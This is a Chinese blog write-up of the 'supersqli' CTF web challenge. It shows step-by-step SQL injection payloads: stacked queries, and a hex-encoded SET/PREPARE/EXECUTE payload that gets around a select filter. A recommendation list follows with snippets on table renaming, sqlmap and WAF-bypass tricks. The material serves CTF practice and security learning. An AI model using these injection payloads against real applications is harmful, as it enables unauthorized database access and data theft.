CTF-WEB-SQL注入-强网杯-攻防世界-随便注-supersqli

已于 2025-02-07 22:08:05 修改
阅读量473 收藏 6
点赞数 7
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: sql 数据库
于 2024-10-10 22:07:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63308767/article/details/142833013

开题这样一个界面

1' order by 2#

判断出是两列

select被过滤了

换个方式,发现可以堆叠注入,查库

查表

查字段

因为select被过滤

第一种方法:用 handler绕过,使用介绍(【MySQL】MySQL 之 handler 的详细使用及说明_mysql handler-优快云博客

第二种方法:用sql内置方法绕过

我们常规查询数据是这样:select flag from `1919810931114514`

把上面sql语句进行16进制编码:73656c65637420666c61672066726f6d20603139313938313039333131313435313460

注入语句:-1';SeT @a=0x73656c65637420666c61672066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

参考:SQL注入进阶之路-针对堆叠注入的研究 - mi2ac1e - 博客园 (cnblogs.com)

强网 2019】supersqli
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-09 1117
慢慢把以前写在有道云的搬过来 方法一 1、提交1显示正常,提交1’报错,判断此处存在注入 2、order by 3返回错误,order by 2返回正常,说明这张表存在2个字段 3、使用union select 进行联合查询,发现网站过滤了一下字符 4、尝试堆叠注入 1、显示当前数据库所有表 2、查字段 5、获取flag 由于这个站点默认时访问words获取数据并返回的,我们把1919810931114514伪造成words这张表 在1919810931114514这张表中插入ID这个字段
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 1035
文章目录前言一、题目描述二、解题步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 题目分类: CTFWebSQL注入—05—MongoDB+宽字节注入 一、题目描述 题目:研究生的秘密 二、解题步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
攻防世界-Web高手进阶区-supersqli(强网随便)
feng的博客
09-14 5393
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
攻防世界supersqli-强网随便(堆叠注入顶级练手题目)
yuanxu8877的博客
11-28 941
攻防世界supersqli-强网随便(堆叠注入顶级练手题目)
强网 2019[supersqli]
errorr0
12-11 3202
考点:堆叠注入,通过set prepare 绕过select等一些可利用的限制 放入bp测试一下发现报错,得知其为单引号闭合前面order by 还行order by 2 正常回显但3报错得知select中有两个数据。 第一时间想到的是联合注入,结果: 被过滤了,第一时间反应下来是去绕过过滤,不得。通过其它大佬的wp得知这边考点是堆叠注入。同时使得一个sql代码一次性执行两条以上的sql命令。 在本机mysql测试 如: select 1; ----- 1...
[强网2019]supersqli--Web安全进阶系列
xt350488的博客
06-18 406
使用引号判断是否存在sql注入报错,可能存在sql注入注入payload,判断列数,结果为不存在4列换2试试,正常显示,说明存在2列输出结果尝试使用联合注入失败,并且限制了注入payload,存在堆叠注入查看当前数据库表查看words表中的列名,包含id和data这里我们通过修改表名和列名的方式,把结果给爆出来,注入以下payloadsql语句alter的使用:当我们需要修改数据表名或者修改数据表字段时,就需要使用到 MySQL命令。MySQL 的命令用于修改数据库、表和索引等对象的结构。
2018强网CTF-题目整理-校本图片Readme.zip
12-18
2018强网CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 4155
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTFWebSQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 587
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTFWebSQL注入—07—注入点+level 一、题目描述 题目:添加备 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备的地方 2、请求包保存 Step2:添加备后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲。 Step4:爆
攻防世界(CTF)~web-supersqli(详细解题思路)
海鸥先生的博客
05-10 1650
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
攻防世界supersqli做题思路(堆叠注入select绕过)
最新发布
2301_80307383的博客
07-12 722
测试可知,words中的id有正常回显,可把flag所在的表和列改名为id所在的表和列。在尝试大小写,双写,加释也没能绕过select,尝试堆叠注入。prepare用于预备一个语句,并赋予名称,以后可以引用该语句。打开题目,在已知为sql注入时,先测试闭合方式,输入1\。发现报错,接着尝试1' 和 1" 测试出闭合方式为单引号。接着访问1' or 1#即可得到flag。
sql注入过滤关键字(union select等等)
没事我溜达
03-15 9438
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和释,发现单引号即可完成闭合,--+作为释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 7421
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
SQL注入绕过select过滤
qq_43596950的博客
03-25 5133
原题目出自攻防世界收录的2019强网,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL释 union select=>/**/UNION/**/...
SQL注入漏洞(7)SQL注入高级篇
weixin_51339377的博客
03-18 1655
分析目标防火墙并且跳过 1.直接拉黑ip类防火墙 2.过滤删除相应字符的防火墙 1.waf释符号过滤 例题:Sqli-labs T23 特点:释符 --+ # 被过滤掉了 绕过方法:逻辑上补全闭合即可 多加一次url编码只是更安全的绕过 select * from users where id = '' limit 0,1 select * from users where id = ' -1' union select 1,2,'3 ' limit 0...
sql注入(三)绕过方法及防御手段
wangluoanquan111的博客
04-20 1774
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
sql注入过滤select_网站SQL注入渗透测试手法介绍
weixin_39628384的博客
11-26 2067
国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!3.1 SQL注入漏洞3.1.1. 注入分类SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得...
PHP在CTF-Web挑战中的实战应用技巧
标题和描述中提到的知识点是关于在Web环境中使用PHP编程语言进行CTF(Capture The Flag)挑战的介绍。...在CTF-Web-Challenge的环境中,参赛者将有机会通过实战演练这些技术,提升自己的安全技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值